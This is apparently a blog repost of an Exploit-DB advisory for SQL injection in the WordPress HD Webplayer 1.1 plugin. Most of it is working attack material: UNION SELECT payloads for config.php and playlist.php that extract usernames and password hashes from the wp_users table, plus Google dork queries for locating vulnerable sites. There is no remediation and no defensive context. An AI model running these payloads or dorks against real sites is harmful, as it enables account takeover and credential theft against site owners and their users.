
Wordpress HD Webplayer 1.1 SQL Injection

- Januari 28, 2018
# Exploit Title: Wordpress HD Webplayer 1.1 SQL Injection
# Vendor Homepage: http://www.hdwebplayer.com/
# Software Link: http://hdwebplayer.com/downloads/hdwebplayer_wordpress_1.1.zip
# Version: version 1.1
# Tested on: Windows 7

[+]Vulnerability 1 - config.php
# Location :
http://site.com/wp-content/plugins/hd-webplayer/config.php?id= [INJECT HERE]
# Exploit :
config.php?id=1+/*!UNION*/+/*!SELECT*/+1,2,3,group_concat(ID,0x3a,user_login,0x3a,user_pass,0x3b),5,6,7+from+wp_users // Jumlah kolom mungkin berbeda

[+]Vulnerability 2 - playlist.php
# Location:
http://site.com/wp-content/plugins/hd-webplayer/playlist.php?videoid= [INJECT HERE]
# Exploit Code:
playlist.php?videoid=1+/*!UNION*/+/*!SELECT*/+group_concat(ID,0x3a,user_login,0x3a,user_pass,0x3b),2,3,4,5,6,7+from+wp_users // Jumlah kolom mungkin berbeda

Google Dork
# Dork 1 (config.php)
inurl:"/wp-content/plugins/hd-webplayer/config.php?id="
# Dork 2 (playlist.php)
inurl:"/wp-content/plugins/hd-webplayer/playlist.php?videoid="
# Dork 3 (General):
inurl:"/wp-content/plugins/hd-webplayer/"

Source
Exploit-DB: http://www.exploit-db.com/exploits/20918/